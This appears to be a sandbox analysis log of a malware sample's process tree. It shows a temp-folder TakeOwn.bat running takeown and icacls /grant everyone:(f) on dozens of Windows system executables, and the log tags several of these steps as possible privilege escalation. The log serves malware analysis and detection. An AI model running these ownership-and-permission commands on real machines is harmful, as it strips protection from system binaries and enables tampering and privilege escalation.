C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-h..public-utils-shared_31bf3856ad364e35_10.0.22000.1_none_c4795c793bc04b9f\hvsiproxyapp.exe"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-h..public-utils-shared_31bf3856ad364e35_10.0.22000.1_none_c4795c793bc04b9f\hvsiproxyapp.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-h..public-utils-shared_31bf3856ad364e35_10.0.22000.1_none_c4795c793bc04b9f\hvsiproxyapp.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-htmlhelp_31bf3856ad364e35_10.0.22000.1_none_28ee3eaabde6507f\hh.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-htmlhelp_31bf3856ad364e35_10.0.22000.1_none_28ee3eaabde6507f\hh.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-htmlhelp_31bf3856ad364e35_10.0.22000.1_none_28ee3eaabde6507f\hh.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_11.0.22000.120_none_e2284b7d90c8a180\f\iexplore.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_11.0.22000.120_none_e2284b7d90c8a180\f\iexplore.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_11.0.22000.120_none_e2284b7d90c8a180\f\iexplore.exe" /grant "everyone":(f)3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_11.0.22000.120_none_e2284b7d90c8a180\iexplore.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_11.0.22000.120_none_e2284b7d90c8a180\iexplore.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_11.0.22000.120_none_e2284b7d90c8a180\iexplore.exe" /grant "everyone":(f)3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_11.0.22000.120_none_e2284b7d90c8a180\r\iexplore.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_11.0.22000.120_none_e2284b7d90c8a180\r\iexplore.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_11.0.22000.120_none_e2284b7d90c8a180\r\iexplore.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-i..i_initiator_service_31bf3856ad364e35_10.0.22000.1_none_3b0bf3364e41c5b0\iscsicli.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-i..i_initiator_service_31bf3856ad364e35_10.0.22000.1_none_3b0bf3364e41c5b0\iscsicli.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-i..i_initiator_service_31bf3856ad364e35_10.0.22000.1_none_3b0bf3364e41c5b0\iscsicli.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-i..llshield-wow64-main_31bf3856ad364e35_10.0.22000.1_none_c4b0a2008f6c9857\setup.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-i..llshield-wow64-main_31bf3856ad364e35_10.0.22000.1_none_c4b0a2008f6c9857\setup.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-i..llshield-wow64-main_31bf3856ad364e35_10.0.22000.1_none_c4b0a2008f6c9857\setup.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-i..llshield-wow64-main_31bf3856ad364e35_10.0.22000.1_none_c4b0a2008f6c9857\_isdel.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-i..llshield-wow64-main_31bf3856ad364e35_10.0.22000.1_none_c4b0a2008f6c9857\_isdel.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-i..llshield-wow64-main_31bf3856ad364e35_10.0.22000.1_none_c4b0a2008f6c9857\_isdel.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-i..raries-servercommon_31bf3856ad364e35_10.0.22000.1_none_0a23d387a9386cf0\appcmd.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-i..raries-servercommon_31bf3856ad364e35_10.0.22000.1_none_0a23d387a9386cf0\appcmd.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-i..raries-servercommon_31bf3856ad364e35_10.0.22000.1_none_0a23d387a9386cf0\appcmd.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-i..raries-servercommon_31bf3856ad364e35_10.0.22000.1_none_0a23d387a9386cf0\iissetup.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-i..raries-servercommon_31bf3856ad364e35_10.0.22000.1_none_0a23d387a9386cf0\iissetup.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-i..raries-servercommon_31bf3856ad364e35_10.0.22000.1_none_0a23d387a9386cf0\iissetup.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-i..switch-toasthandler_31bf3856ad364e35_10.0.22000.37_none_b6eb9704869b2bfc\f\InputSwitchToastHandler.exe"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-i..switch-toasthandler_31bf3856ad364e35_10.0.22000.37_none_b6eb9704869b2bfc\f\InputSwitchToastHandler.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-i..switch-toasthandler_31bf3856ad364e35_10.0.22000.37_none_b6eb9704869b2bfc\f\InputSwitchToastHandler.exe" /grant "everyone":(f)3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-i..switch-toasthandler_31bf3856ad364e35_10.0.22000.37_none_b6eb9704869b2bfc\InputSwitchToastHandler.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-i..switch-toasthandler_31bf3856ad364e35_10.0.22000.37_none_b6eb9704869b2bfc\InputSwitchToastHandler.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-i..switch-toasthandler_31bf3856ad364e35_10.0.22000.37_none_b6eb9704869b2bfc\InputSwitchToastHandler.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-i..switch-toasthandler_31bf3856ad364e35_10.0.22000.37_none_b6eb9704869b2bfc\r\InputSwitchToastHandler.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-i..switch-toasthandler_31bf3856ad364e35_10.0.22000.37_none_b6eb9704869b2bfc\r\InputSwitchToastHandler.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-i..switch-toasthandler_31bf3856ad364e35_10.0.22000.37_none_b6eb9704869b2bfc\r\InputSwitchToastHandler.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-i..tional-chinese-core_31bf3856ad364e35_10.0.22000.1_none_ba1c45853a21e276\IMTCLNWZ.EXE"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-i..tional-chinese-core_31bf3856ad364e35_10.0.22000.1_none_ba1c45853a21e276\IMTCLNWZ.EXE"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-i..tional-chinese-core_31bf3856ad364e35_10.0.22000.1_none_ba1c45853a21e276\IMTCLNWZ.EXE" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-i..tional-chinese-core_31bf3856ad364e35_10.0.22000.1_none_ba1c45853a21e276\IMTCPROP.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-i..tional-chinese-core_31bf3856ad364e35_10.0.22000.1_none_ba1c45853a21e276\IMTCPROP.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-i..tional-chinese-core_31bf3856ad364e35_10.0.22000.1_none_ba1c45853a21e276\IMTCPROP.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-icacls_31bf3856ad364e35_10.0.22000.1_none_934ce708df2406c6\icacls.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-icacls_31bf3856ad364e35_10.0.22000.1_none_934ce708df2406c6\icacls.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-icacls_31bf3856ad364e35_10.0.22000.1_none_934ce708df2406c6\icacls.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-icm-dccw_31bf3856ad364e35_10.0.22000.1_none_7b86f3d8c7ad2322\dccw.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-icm-dccw_31bf3856ad364e35_10.0.22000.1_none_7b86f3d8c7ad2322\dccw.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-icm-dccw_31bf3856ad364e35_10.0.22000.1_none_7b86f3d8c7ad2322\dccw.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-icm-ui_31bf3856ad364e35_10.0.22000.1_none_9af0ff62d9f93c09\colorcpl.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-icm-ui_31bf3856ad364e35_10.0.22000.1_none_9af0ff62d9f93c09\colorcpl.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-icm-ui_31bf3856ad364e35_10.0.22000.1_none_9af0ff62d9f93c09\colorcpl.exe" /grant "everyone":(f)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-ie-htmlapplication_31bf3856ad364e35_11.0.22000.1_none_ede3b211ad614222\mshta.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-ie-htmlapplication_31bf3856ad364e35_11.0.22000.1_none_ede3b211ad614222\mshta.exe"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-ie-htmlapplication_31bf3856ad364e35_11.0.22000.1_none_ede3b211ad614222\mshta.exe" /grant "everyone":(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-ie-internetexplorer_31bf3856ad364e35_11.0.22000.1_none_c3ebc2d9be02340b\ieUnatt.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-ie-internetexplorer_31bf3856ad364e35_11.0.22000.1_none_c3ebc2d9be02340b\ieUnatt.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-ie-internetexplorer_31bf3856ad364e35_11.0.22000.1_none_c3ebc2d9be02340b\ieUnatt.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-iis-legacysnapin_31bf3856ad364e35_10.0.22000.1_none_e1b91bffeb2fd335\InetMgr6.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-iis-legacysnapin_31bf3856ad364e35_10.0.22000.1_none_e1b91bffeb2fd335\InetMgr6.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-iis-legacysnapin_31bf3856ad364e35_10.0.22000.1_none_e1b91bffeb2fd335\InetMgr6.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_10.0.22000.1_none_7181babcedfc2cb7\aspnetca.exe"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_10.0.22000.1_none_7181babcedfc2cb7\aspnetca.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_10.0.22000.1_none_7181babcedfc2cb7\aspnetca.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_10.0.22000.1_none_7181babcedfc2cb7\iisreset.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_10.0.22000.1_none_7181babcedfc2cb7\iisreset.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_10.0.22000.1_none_7181babcedfc2cb7\iisreset.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-ime-eashared-ccshared_31bf3856ad364e35_10.0.22000.1_none_36b24ce0b35c1e60\IMCCPHR.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-ime-eashared-ccshared_31bf3856ad364e35_10.0.22000.1_none_36b24ce0b35c1e60\IMCCPHR.exe"3⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-ime-eashared-ccshared_31bf3856ad364e35_10.0.22000.1_none_36b24ce0b35c1e60\IMCCPHR.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-infdefaultinstall_31bf3856ad364e35_10.0.22000.1_none_cd2ccbb7d5393f64\InfDefaultInstall.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-infdefaultinstall_31bf3856ad364e35_10.0.22000.1_none_cd2ccbb7d5393f64\InfDefaultInstall.exe"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-infdefaultinstall_31bf3856ad364e35_10.0.22000.1_none_cd2ccbb7d5393f64\InfDefaultInstall.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-installer-executable_31bf3856ad364e35_10.0.22000.1_none_aa19bcc4bf43b810\msiexec.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-installer-executable_31bf3856ad364e35_10.0.22000.1_none_aa19bcc4bf43b810\msiexec.exe"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-installer-executable_31bf3856ad364e35_10.0.22000.1_none_aa19bcc4bf43b810\msiexec.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-international-unattend_31bf3856ad364e35_10.0.22000.1_none_20b20a4d26c387fd\MuiUnattend.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-international-unattend_31bf3856ad364e35_10.0.22000.1_none_20b20a4d26c387fd\MuiUnattend.exe"3⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-international-unattend_31bf3856ad364e35_10.0.22000.1_none_20b20a4d26c387fd\MuiUnattend.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-ipconfig_31bf3856ad364e35_10.0.22000.1_none_acd238f8511877bc\ipconfig.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-ipconfig_31bf3856ad364e35_10.0.22000.1_none_acd238f8511877bc\ipconfig.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-ipconfig_31bf3856ad364e35_10.0.22000.1_none_acd238f8511877bc\ipconfig.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-iscsi_initiator_ui_31bf3856ad364e35_10.0.22000.1_none_388372a9953bb48f\iscsicpl.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-iscsi_initiator_ui_31bf3856ad364e35_10.0.22000.1_none_388372a9953bb48f\iscsicpl.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-iscsi_initiator_ui_31bf3856ad364e35_10.0.22000.1_none_388372a9953bb48f\iscsicpl.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-ktmutil_31bf3856ad364e35_10.0.22000.1_none_e92240163a52addb\ktmutil.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-ktmutil_31bf3856ad364e35_10.0.22000.1_none_e92240163a52addb\ktmutil.exe"3⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-ktmutil_31bf3856ad364e35_10.0.22000.1_none_e92240163a52addb\ktmutil.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-label_31bf3856ad364e35_10.0.22000.1_none_b7c753c003725517\label.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-label_31bf3856ad364e35_10.0.22000.1_none_b7c753c003725517\label.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-label_31bf3856ad364e35_10.0.22000.1_none_b7c753c003725517\label.exe" /grant "everyone":(f)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-legacyhwui_31bf3856ad364e35_10.0.22000.1_none_430c6a5b816abeb9\hdwwiz.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-legacyhwui_31bf3856ad364e35_10.0.22000.1_none_430c6a5b816abeb9\hdwwiz.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-legacyhwui_31bf3856ad364e35_10.0.22000.1_none_430c6a5b816abeb9\hdwwiz.exe" /grant "everyone":(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-m..-management-console_31bf3856ad364e35_10.0.22000.1_none_700b9308aecc1425\mmc.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-m..-management-console_31bf3856ad364e35_10.0.22000.1_none_700b9308aecc1425\mmc.exe"3⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-m..-management-console_31bf3856ad364e35_10.0.22000.1_none_700b9308aecc1425\mmc.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-m..-odbc-administrator_31bf3856ad364e35_10.0.22000.1_none_a4e82f5676e0e198\odbcad32.exe"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-m..-odbc-administrator_31bf3856ad364e35_10.0.22000.1_none_a4e82f5676e0e198\odbcad32.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-m..-odbc-administrator_31bf3856ad364e35_10.0.22000.1_none_a4e82f5676e0e198\odbcad32.exe" /grant "everyone":(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-m..ac-sql-cliconfg-exe_31bf3856ad364e35_10.0.22000.1_none_d0b58ed08fdbb9ff\cliconfg.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-m..ac-sql-cliconfg-exe_31bf3856ad364e35_10.0.22000.1_none_d0b58ed08fdbb9ff\cliconfg.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-m..ac-sql-cliconfg-exe_31bf3856ad364e35_10.0.22000.1_none_d0b58ed08fdbb9ff\cliconfg.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-m..ommandlineutilities_31bf3856ad364e35_10.0.22000.1_none_a92436e98f43ccd7\find.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-m..ommandlineutilities_31bf3856ad364e35_10.0.22000.1_none_a92436e98f43ccd7\find.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-m..ommandlineutilities_31bf3856ad364e35_10.0.22000.1_none_a92436e98f43ccd7\find.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-m..ommandlineutilities_31bf3856ad364e35_10.0.22000.1_none_a92436e98f43ccd7\replace.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-m..ommandlineutilities_31bf3856ad364e35_10.0.22000.1_none_a92436e98f43ccd7\replace.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-m..ommandlineutilities_31bf3856ad364e35_10.0.22000.1_none_a92436e98f43ccd7\replace.exe" /grant "everyone":(f)3⤵
-
-
-
